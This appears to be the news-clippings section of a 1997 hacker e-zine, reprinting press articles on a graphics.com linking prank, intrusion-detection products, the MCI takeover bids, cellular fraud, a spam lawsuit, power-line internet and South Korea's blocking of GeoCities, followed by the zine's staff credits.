It soon became apparent that the flood of links was caused by a browser quirk that caused certain kinds of badly-coded graphics URLs to link to his domain. Boy seized upon the serendipitous glitch as an opportunity to passively hack those sites that erroneously linked to his, loading them with banners featuring subversive slogans.
For the past several weeks, therefore, unwary visitors to sites, including those for such corporate and political powers as Packard Bell, Corel, and the government of Hong Kong, have been confronted with graphics telling them, "You are only a resource for profit" or, "Revolution is the most beautiful word."

"Of course returning these very subversive graphics that some of these sites are getting, probably won't make the owners of these sites very happy," says Boy, who runs sites for a situationist organization, an Austrian arts group, a bookstore, and his own shareware business off the same server. To show there's no ill-will intended, however, he puts the URL to his site on all the banners, and offers a page explaining how to fix the broken links.

Since many webmasters put their graphics files in a folder labeled "graphics," the "hack" takes advantage of intelligent browsers' default tendency to interpret "graphics" in badly-coded links as "www.graphics.com." The problem is exacerbated when visitors to a site mistype its URL with a question mark instead of a slash. Boy says that almost half of his server's current traffic of 1,500 daily hits are from these errors.

When this plethora of hits began showing up on his site, Boy simply adapted a randomized error-page system he had designed for avoiding static 404 messages on his own site. Now when graphics.com gets a graphics request, a CGI script randomly serves up one of 11 slogans.

Netscape spokesman Christopher Hoover says this is the first time his company has heard of this kind of problem associated with their browser's ability "for resolving these kinds of conflicts" by adding .com to links - a feature which generally provides a useful coding shortcut. He says it's a quirk that's due to the near ubiquity of "graphics" as the name for the folder holding a Web site's art files, and that there's unlikely to be another domain name of similar vulnerability.
Despite Boy's efforts to help sites remedy the underlying code problems, his prank has provoked a number of mystified and angry messages from surfers and site administrators. One "irate webmaster" from a computer reseller's site even threatened to alert the FBI's computer security division, but so far no legal actions have been taken.

And Boy isn't particularly worried that they will be, since he never touches anybody else's site. "Their servers are hacking mine," he says. "I'm just controlling it."

©1993-97 Wired Ventures, Inc.

_____________________________________________________________

High-Tech Burglar Alarms Expose Intruders
09/18/97
By Rutrell Yasin, InternetWeek

If you're not thinking about installing "burglar alarms" on your network, chances are you will soon.

An emerging class of high-tech intrusion detection systems -- also known as burglar alarms -- promises to alert IT administrators when their network security is breached by unauthorized intruders.

Security companies such as Axent Technologies, Internet Security Systems, Intrusion Detection, and the WheelGroup are shipping tools that give corporations a layer of defense that goes beyond the firewall. Network General earlier this month became the first networking vendor to enter the fray with CyberCop, a tool that monitors networks for external and internal attacks.

"Firewalls are very important. They can be very effective, but they can't do everything. They can be circumvented," said Richard Power, director of research and publications at the Computer Security Institute, in San Francisco.

Firewalls protect gateways to the network, but in today's complex Web of private networks, intranets and extranets, the Internet is not the only entrance to the network, Power said.

Firewalls are usually placed in front of Internet access links, wide-area links, and dial-in servers to monitor the protocols and services that flow in and out of a network.
But they cannot tell when security has been breached, and they tend to slow network performance when they are deployed in internal networks.

Working In Perfect Harmony

Intrusion-detection systems complement firewalls by monitoring the network and performing real-time capture and analysis of packet headers and content data. Using sophisticated algorithms to recognize attacks, intrusion-detection systems can send alerts to administrators to warn them of possible break-ins. Some products can even stop intruders from breaking into the network.

In the past, intrusion detection was a very labor-intensive, manual task, said Jude O'Reilley, a research analyst at Gartner Group's network division, in Stamford, Conn. "However, there's been a leap in sophistication over the past 18 months," and a wider range of automated tools is hitting the market, he said.

Network General's intrusion-detection system draws on the company's experience in delivering packet-level analysis systems -- such as the popular Sniffer analyzer -- to provide a network-based security system, according to Katherine Stolz, product manager for Internet security systems at Network General, in Menlo Park, Calif.

CyberCop uses algorithms from the San Antonio-based WheelGroup and consists of sensors, a management server, and a Java-compliant browser. Sensors capture data packets and analyze them for suspicious behavior. Data packets are saved in an "Evidence Trace File" to record attackers' footprints as they move around the network. Sensors pass off events to the management server, which sends alarms via E-mail, pager, or SNMP traps, alerting security administrators to take action.

CyberCop's closest competitor is Internet Security Systems' RealSecure software, which includes an attack recognition engine that ferrets out suspicious behavior. "The trickiest part is understanding attacks," said Patrick Taylor, vice president of marketing at Atlanta-based ISS.
RealSecure -- which has received good reviews for the breadth and range of attacks it can discover -- brings a more server-based approach to intrusion detection. "Depending on the network topology, having a box on a network segment doesn't work for everyone. Some users need to monitor the activity of servers," Taylor said.

ISS' strategy is to sell its technology to other vendors. During the next six to 12 months, RealSecure will be embedded in many of the leading firewalls, switches, and servers, he said.

Not The End-All

Intrusion-detection systems hold a great deal of promise for security administrators, but like firewalls, they do not solve all security problems, CSI's Power cautioned.

At this stage, "intrusion-detection systems detect only what they know to look for," he said. In the future, vendors will offer tools with expert systems capabilities that can detect suspicious behavior, he said.

Intrusion-detection tools are aimed at vertical markets such as financial, telecommunications, government, and military organizations. To be successful in the mainstream market, the tools will have to be inexpensive, easy to use, and able to support intranet applications and popular workstation platforms such as Windows NT, Gartner's O'Reilley said.

Firewall vendors -- which are now offering aggressively priced, plug-and-play systems -- can serve as a good model for aspiring intrusion-detection vendors, O'Reilley said.

Intrusion-detection tools can cost anywhere from $40,000 to $50,000, but prices are likely to drop during the next 18 months, he said.

©CMP Media, 1996.

_____________________________________________________________

WorldCom Bid Threatens BT-MCI Merger
By Douglas Hayward, TechWire

LONDON -- MCI's mega merger with British Telecom could be abandoned, following a counterbid for the U.S. long distance carrier by WorldCom.
The aggressive and acquisitive WorldCom offered MCI shareholders $41.50 a share Wednesday morning, more than the equivalent of $34 a share BT proposes to pay.

The bid values MCI at $30 billion -- 41 percent more than the company's $21 billion price tag at close of markets Tuesday, WorldCom said in a statement Wednesday. The combined group, which would be 25 percent owned by MCI's current shareholders, would have revenues of some $30 billion, WorldCom added.

BT shares were up 9 percent at midday Wednesday on news of the bid, which could net BT a healthy profit on its 20 percent stake in MCI. BT had no comment to make on the bid early Wednesday afternoon.

WorldCom has acquired 40 companies in the past five years, including Internet carrier MFS. Acquiring MCI will boost the combined group's earnings by up to 22 percent and cut its costs by $2.5 billion in the first year after the deal closes, WorldCom said.

WorldCom chief executive Bernard Ebbers attempted to boost his company's chances by saying that joining WorldCom made better business sense for MCI than being snatched up by BT. The deal would result in savings for the combined group of roughly $5 billion in the fifth year of the new group's existence, he added.

"While MCI and British Telecom are both great companies, the fit between them just doesn't work without sufficient local network assets in place," said Ebbers in a letter to MCI chairman Bert Roberts. Because WorldCom has those assets in place, far greater synergies than BT can offer are possible, he said.

"It is clearly a superior fit and, as a result, a superior offer," Ebbers said.

WorldCom is trying to exploit the fact that BT was recently forced to lower its bid for MCI, after the American carrier disclosed it was losing more money than it had previously thought in its attempt to break into the local phone market in North America.

Ebbers also appealed to MCI's sense of patriotism. "Our two companies are the paradigm for the American entrepreneurial spirit," he said. "We have both forged significant inroads into industries long dominated by giants, and have been among the first to offer consumers a choice of providers for local, long distance, data, and other services."

Although BT shares rose dramatically Wednesday morning, the euphoria in London could be short-lived. If the bid succeeds, it could destroy BT's international strategy, which is heavily dependent on its alliance with MCI, particularly in Latin America.

Concert, the international joint venture of BT and MCI, has secured several major customer contracts and alliances with leading telephone operators including Telefonica de Espana and Portugal Telecom. Those contracts are at risk if the WorldCom bid succeeds.

Copyright (c) CMP Media, 1996.

_____________________________________________________________

U.S. cell phone industry battles service thieves
October 1, 1997
By Brad Liston

ORLANDO, Fla. (Reuter) - Thousands of cellular telephone users have had the unfortunate experience of opening their monthly bills and finding hundreds of dollars in charges for calls they did not make.

The good news for them is that such fraud is way down, according to delegates to a conference of the U.S. wireless telephone industry Wednesday. But the bad news is that wireless thieves are getting more sophisticated.

"The criminal customer will never go away," warned Roseanna DeMaria, vice president for business security at AT&T Corp. Wireless Services. "He'll just engage in some very creative R&D."

At the Cellular Telecommunications Industry Association's Fraud '97 conference, industry leaders said the theft of wireless services in 1996 had dropped to 3 percent of annual revenues. In the early 1990s, that number was 6 percent. There currently are about 50 million wireless customers in the United States.
Before 1995, stealing a cell phone signal was as simple as standing outside a shopping mall in an area with heavy cellular traffic and picking up a signal that could be reprogrammed into another phone to make it look as if its calls were coming from a legitimate account.

New technologies are making that more difficult, said Thomas McClure, the association's director of fraud management.

For example, wireless service providers can now match an electronic serial number unique to a digital wireless phone with another identification number unique to each account in a system similar to the military's "friend and foe" technology. If someone uses an account on an unauthorized phone, he trips a computer that alerts the service provider.

Thanks to that technology, called radio frequency fingerprinting, cellular thieves who could once promise service for 30 days before phone companies caught on now can promise only about three days.

For older analog phones, the industry is becoming more adept at spotting changes in customer patterns. "If your account suddenly shows, say, three calls a day to Bangladesh, then a computer will recognize that, and someone will contact you to confirm the calls," McClure said.

Law enforcement sources say the ranks of cellular thieves include the usual suspects -- drug smugglers, organized crime figures and criminal fugitives, among others.

"The professional criminal is clearly going after our service," McClure said. "He wants to become the invisible man."

So where do criminals, whose expertise may lie more along the line of cutting cocaine or breaking thumbs, find people sharp enough to steal cutting-edge technology?

"They recruit it," Jeff Nelson, spokesman for the Cellular Telecommunications Industry Association, said. "We're up against some of the best minds in the nation."

(C) Reuters Ltd. All rights reserved.
_____________________________________________________________

Junk Mail Giant Cyber Promotions Is Back Online
By Bill Pietrucha

WASHINGTON, DC, U.S.A., 1997 OCT 3 (NB) -- Cyber Promotions Inc., the online junk mail giant, has been reconnected to Internet service provider Apex Global Internet Services (AGIS).

"We just went back up in the past hour," a Cyber Promotions spokesperson told Newsbytes. "We're not fully functional yet, but we are back online."

Earlier today, Cyber Promotions still was not reconnected to AGIS, despite a ruling last Tuesday that AGIS must reconnect Cyber Promotions until October 16.

Earlier this week, Cyber Promotions also posted a $12,500 bond ordered by Judge Anita Brody of the US District Court in Philadelphia to pay for any possible damage to AGIS' network caused by "anti-spam" spam attacks against both Cyber Promotions and AGIS for providing service to Cyber Promotions.

This past Tuesday, Judge Brody granted Dresher, Pennsylvania-based Cyber Promotions a temporary preliminary injunction, forcing AGIS to reconnect the bulk e-mail provider to their service. Brody's ruling said that the contract between AGIS and Cyber Promotions requires AGIS to issue a 30 day notice before terminating service.

"We obviously are not pleased with the court's ruling," AGIS CEO Phillip Lawlor said after the ruling. "We are not happy with the court's decision, but we must abide by it."

Lawlor, who said he regretted ever taking Cyber Promotions on as a client, said Cyber Promotions told the court it is looking for other Internet Service Providers to handle the junk mail account.

Lawlor also left the door open for Cyber Promotions, saying AGIS "is looking at all options" regarding October 17, the date AGIS can again disconnect Cyber Promotions. "We'll decide between now and that time what is the best course of action to take," Lawlor said.

AGIS counsel Philip Katauskas, however, said, "our actions to date say we don't want them on our network."
In late September, the Dearborn, Michigan-based AGIS, the nation's fourth largest carrier of Internet traffic, disconnected several unsolicited, bulk e-mailers, including Cyber Promotions Inc., "for security reasons."

"The attacks were of a nature which not only threatened portions of our global, public network, but other parts of the Internet as well," Lawlor said. "Our engineers simply followed AGIS standard security procedures in shutting their service down."

Reacting to the shut-off of service, Cyber Promotions filed suit against AGIS in US District Court in Philadelphia for allegedly breaking its distribution contract.

US District Court Judge Brody, citing the breach of contract by AGIS for shutting down Cyber Promotions' connection without warning, said in her ruling that "the fact that Cyber is an unpopular citizen of the Internet does not mean that Cyber is not entitled to have its contracts enforced in a court of law or that Cyber is not entitled to such injunctive relief as any similarly situated business."

©1997 Newsbytes

_____________________________________________________________

Electric Outlets Could Be Link To the Internet
By Gautam Naik
The Wall Street Journal
10/07/97

LONDON -- Engineers claim to have developed a breakthrough technology that would let homeowners make phone calls and access the Internet at high speeds via the electric outlets in their walls.

If the technology developed by United Utilities PLC and Northern Telecom Ltd. proves commercially viable, it could transform power lines around the world into major conduits on the information superhighway. Because electricity flows into virtually every home and office, the new technology could give power companies easy entree into the phone and Internet access businesses, thus posing a serious threat to current providers of those services.
Both United Utilities, a power company, and Northern Telecom, a Canadian maker of telecom gear, confirmed that their system was "ready for the mass market," but declined to reveal details until a news conference scheduled for tomorrow. A Northern Telecom spokesman also declined to elaborate.

While the technology must still be proven on a large scale, the two companies have tested telephone service over power lines in about 20 U.K. households over the last 12 months -- with positive results, according to Alistair Henderson, chief of technology at Energis PLC, the telecom unit of National Grid Group PLC, which owns and operates the electricity-transmission system in England and Wales.

Energis, one of several power companies that has secretly worked with United Utilities on the "power line telephony" project, hopes to use the system to offer data services to its own business customers.

"It's very good news for utilities, indeed," says Mr. Henderson. "Everybody has an electricity line to their homes, and every business has electric supply.

"At long last, the local monopoly of the incumbent telecom operators is about to be demolished."

But some questions remain. Although United Utilities' initial tests have been successful, technical and safety wrinkles have to be ironed out. There's also likely to be intensifying competition from a host of other wanna-be phone and Internet service providers, including cable companies and outfits that use wireless technology to provide high-speed access.

And for the new system to be commercially feasible, a power utility would have to sign up 40% or more of homes and offices in a particular neighborhood, Mr. Henderson says. This could prove a difficult task as existing telecommunications players have proven to be adept at making life hard for new entrants. The Baby Bells in the U.S., for example, have largely thwarted efforts by AT&T Corp. and MCI Communications Corp. to enter the local telephone business.
In recent years electric utilities in the U.S. and Europe have been trying to enter the telecom fray by the more conventional method of stringing fiber-optic cables along power lines. But so far they've had limited success. As a result, utilities have waited for exactly this kind of breakthrough to make a big splash in the telecom wars.

While electric lines have been used before to zap tiny amounts of data between computers, their capacity has always been limited, making commercial applications unfeasible. Now United Utilities' telecom arm, Norweb Communications, has found a way to transmit data at a speed of more than 384 kilobits per second over regular electricity lines -- more than 10 times the speed of Internet modems used by most households with regular telephone lines.

The advantage of the latest system -- which uses cellular phone technology to transmit signals along electric wires -- is that utilities needn't spend vast amounts of money to build new telecom infrastructure, since existing power lines can simultaneously transmit both electricity, and a phone call, say. Electricity doesn't interfere with the phone transmission for the same reason that a radio broadcast doesn't interfere with a simultaneous TV broadcast: the frequencies are very different.

"Utilities won't have to touch the wires underground," notes Mr. Henderson.

Of course, there will be some cost to utilities that want to commercialize the new technology and enter the telecom business. Utilities will have to install a device in each residence or office to separate the electricity and phone transmissions. From the device, one line will deliver the telephone and Internet link, while the other will deliver electricity.

In the case of the two companies' test, Northern Telecom is believed to have built the box that separates the power and data transmissions.

Jennifer Schenker contributed to this article.
_____________________________________________________________

Coming Soon: Net Access Through Power Lines
October 8, 1997
By Reuters

"Canada's Northern Telecom (Nortel) and Britain's Norweb Communications today unveiled new technology allowing reliable, low-cost, high-speed access to the Internet through the domestic electricity supply.

In a move heralding the first competition between electricity companies and telecommunications carriers, the two groups said their patented technology would allow power firms to convert their infrastructures into information access networks.

Having reduced electrical interference on power lines, the companies said they could shunt data -- and possibly voice -- over power lines into the home at up to 1MB per second. This is up to ten times faster than ISDN, the fastest currently available speed for domestic computer users.

Although it is slower than rival ADSL technology being developed by British Telecommunications, which upgrades copper wires, Norweb and Nortel's technology is much cheaper for operators to install.

All consumers need is the equipment developed by Nortel and Norweb -- an extra card for personal computers, some software to handle subscription, security, and authentication services, and a small box that is installed next to the electricity meter. This will send and receive data and is in turn linked to a personal computer through an ordinary coaxial cable.

Peter Dudley, vice president of Nortel, said the groups had an "absolutely spectacular" amount of interest from electricity companies in Britain and abroad that are keen to offer the service to consumers. "The race is on to be first," he told Reuters.

Prices will be set by electricity companies that offer the service. But consumers currently spend an average of 20 to 30 pounds ($48.60) per month for Internet access -- and the new service offers permanent access without telephone costs.

"Assuming they continue to spend at that rate, it is not unreasonable to assume that is the kind of tariffing that may be submitted," Dudley said.

The Canadian telecoms equipment maker, and Norweb, part of England's multiutility United Utilities, said their technology was fast enough for most future domestic or small office applications and was cost effective enough to allow operators returns on investments.

"As one of the first practical, low cost answers to the problem of high speed access to the Internet, this technology will unleash the next wave of growth," Dudley said.

The two companies have developed a "specialized signaling scheme" that allows them to carry data traffic between local power substations and homes, effectively turning the electricity supply into a communications network. Each substation is then linked by fiber-optic circuits to a central switch -- and from there into the worldwide computer network.

After 18 months of refining and upgrading a prototype and promising "oodles of bandwidth," the companies said they planned to market the technology in Europe and the Asia Pacific region. "We are ready to ship in volume," said Ian Vance, vice president and chief scientist at Nortel Europe.

Banking on high growth and good economic returns, Norweb hopes to attract around 200 customers in a marketing pilot in northwestern England in the second quarter of 1998 before rolling out the service."

_____________________________________________________________

GTE Makes $28B Cash Offer For MCI
By Kora McNaughton, TechInvestor

GTE made a $28 billion, all-cash bid Wednesday to acquire MCI, bringing to three the number of suitors pursuing the long-distance carrier.

The latest offer, which values MCI stock at $40 a share, follows WorldCom's $30 billion bid, made two weeks ago. The proposed stock deal from Jackson, Miss.-based WorldCom would give MCI shareholders $41.50 per share.
The first suitor, British Telecom, needed only final shareholder approval for its $23 billion marriage to MCI when WorldCom made its higher bid.

But now GTE is in the game. CEO Charles Lee offered MCI Chairman Bert Roberts the chairmanship of the merged company, which would be headquartered in Washington, D.C., where MCI is located. Lee said his company would also consider a cash and stock deal rather than an all-cash acquisition.

In a letter to Roberts, Lee said a merger would create a company with more than $40 billion in annual revenue, more than 21 million local and 24 million long-distance lines, and 5 million wireless customers. In addition, Lee continued, it would result in more efficient operations and new revenue opportunities.

"No two companies in the industry today are more complementary or better situated to expand the availability and breadth of bundled service offerings to local, national and international customers," the letter read.

GTE also said it is willing to negotiate a continued relationship with British Telecom if its offer is accepted.

MCI said its board "will meet shortly to review all issues and options with respect to the GTE proposal and the unsolicited proposal received from WorldCom, in the context of the company's strategic merger agreement with BT."

But the BT deal isn't likely to happen, analysts said. "MCI is in play now," said Steve Shook, an analyst with Interstate/Johnson Lane in Charlotte, N.C. "This is just one more nail in the coffin for BT."

British Telecom had planned to pay about $23 billion, a price that was reduced after MCI revealed last summer that it would incur hundreds of millions of dollars in losses trying to enter the local phone market this year.

The prospect of another uninvited guest at the MCI bidding party sent shares of MCI, British Telecom, WorldCom, and GTE in opposite directions Wednesday.
Trading of MCI and GTE shares was suspended around 1:00 p.m., but MCI [MCIC] shares resumed trading an hour later and closed up 1 9/16 to 36 7/8. GTE [GTE] was up 2 3/16 at 48 before the suspension of trading. Shares of British Telecom [BTY], which owns a 20 percent stake in MCI, climbed 2 11/16 to 75, while WorldCom [WCOM] fell 1 5/16 to 35 7/16.

MCI's board had been considering WorldCom's offer but had not yet made a decision about whether to abandon the BT deal. Shareholder approval is still needed for any merger, whether it is with BT, WorldCom, or GTE.

Shook said the WorldCom offer remains the best of the bunch. Although GTE's offer is all cash, "it's not like you're getting a junky stock with WorldCom," he said. "You're getting really good currency. WorldCom has always delivered on what they said."

But if the prospect of a merged WorldCom-MCI was more appetizing to analysts than the BT deal, the advantages over GTE's proposal are not so clear. BT has no presence in the U.S. local phone market, which MCI has been trying, with little success, to penetrate. WorldCom has a limited local business, while GTE already provides local service in 29 states.

GTE is also a contender in the race to provide one-stop shopping for communications services, including local and long-distance calling as well as data services such as Internet access. Last May, GTE bought Internet access provider BBN, and it has a strategic alliance with Cisco to develop enhanced data and Internet services.

Earlier Wednesday, GTE reported third quarter profits of $756 million, or 79 cents a share, beating Wall Street estimates of 77 cents per share, as reported by First Call.

During the quarter, consolidated revenue was up 11 percent to $5.94 billion, compared to $5.34 billion in the third quarter last year. The 11 percent jump includes $127 million from GTE's acquisition of BBN. Excluding the $127 million of new revenue related to BBN, sales grew 8.8 percent.

"These results illustrate our success in positioning GTE for the future," said GTE CEO Charles Lee. "The BBN acquisition, completed during the quarter, represents the cornerstone of GTE's strategy to become a dominant player in the data market."

©CMP Media, 1997.

_____________________________________________________________

GeoCities Sites Blocked In South Korea
10/22/97
By John Borland, Net Insider

In the second such instance of international censorship leveled at the company this year, all sites on the sprawling GeoCities network of Websites have been blocked in South Korea.

Company officials confirmed Wednesday that the South Korean government asked the agency that handles network traffic in that country to block access to all GeoCities sites by South Korean citizens. The request came in reaction to a single pro-North Korean site on the GeoCities network.

"Unfortunately they are blocking access to over a million sites," said GeoCities spokesman Bennett Kleinberg, of Edelman Public Relations Worldwide. "GeoCities has issued a letter to the Consulate General … asking that they look into the situation."

The company first learned of the blockage on Oct. 12, through an E-mail from a user, Kleinberg said. After examining the offending page, the company determined that it did not violate the contract that all GeoCities "homesteaders" must sign, and decided to let it remain online.

The page, sponsored by a group calling itself the Australian Association for the Study of the Juche Idea, praises North Korean philosophy and leadership. Juche, it says, is a concept developed by late North Korean President Kim Il Sung focusing on self-reliance and national independence.

Korean officials at the country's San Francisco Consulate said they did not have enough knowledge of the situation to comment.

The action is the second time this year that GeoCities sites have been unavailable to an entire country of users.
In June, the Malaysian government asked the country's single Internet service provider to block access to GeoCities, again because of a single site that was critical of the government. In that case, however, GeoCities determined that the site's calls for "insurrection and revolution" had violated the service's terms of agreement, and quickly took it offline.

"We reserve the right to pull any site at any time" that has violated the service's contract, Kleinberg said. "But at this point the determination has been made that [the pro-North Korean site] hasn't done that."

The action was not unexpected coming from the current South Korean leadership, said Stanton McCandlish, program director at the Electronic Freedom Foundation. The government has repeatedly shut down South Korean Websites disseminating pro-North Korean information, he said.

"They [South Korean Leadership] are used to being able to unilaterally ban things," McCandlish said. "The Internet is not a medium that can be effectively censored. It's a hard lesson for them to learn."

As of Wednesday, GeoCities had not heard back from the Korean government, Kleinberg said, but hoped to resolve the situation through normal trade and diplomatic channels.

©CMP Media, 1997.
═──────────────────────────────────────────────────────────═
┌--────────────────────────┐
: thtj communications, inc.│
·-──-──────────────────────┘
        Editor-in Chief: Scud-O, scud@thtj.com
       Executive Editor: KungFuFox, kungfufox@thtj.com
     Submissions Editor: Keystroke, submissions@thtj.com
    Distribution Editor: Malhavoc, malhavoc@thtj.com
           Site Manager: Scud-O, scud@thtj.com
Special Features Editor:
        Content Editors: FH, fh@thtj.com
                         Phrax, phrax@thtj.com
                         Shok,
          Staff Writers: memor, memor@thtj.com
                         ArcAngel, arcangel@thtj.com
                         lurk3r,
                         Shok,
                         The Messiah,
═──────────────────────────────────────────────────────────═
│ Where It's At │
On Undernet: #phreak #hackphreak #hackers #carparts
On EFNet: #linuxos #phrack #sinnerz
═──────────────────────────────────────────────────────────═
A-th-a-th-a-th-a-that's all folks!
┌--───────────────────────┐
: - End of Communique -   │
·-──-─────────────────────┘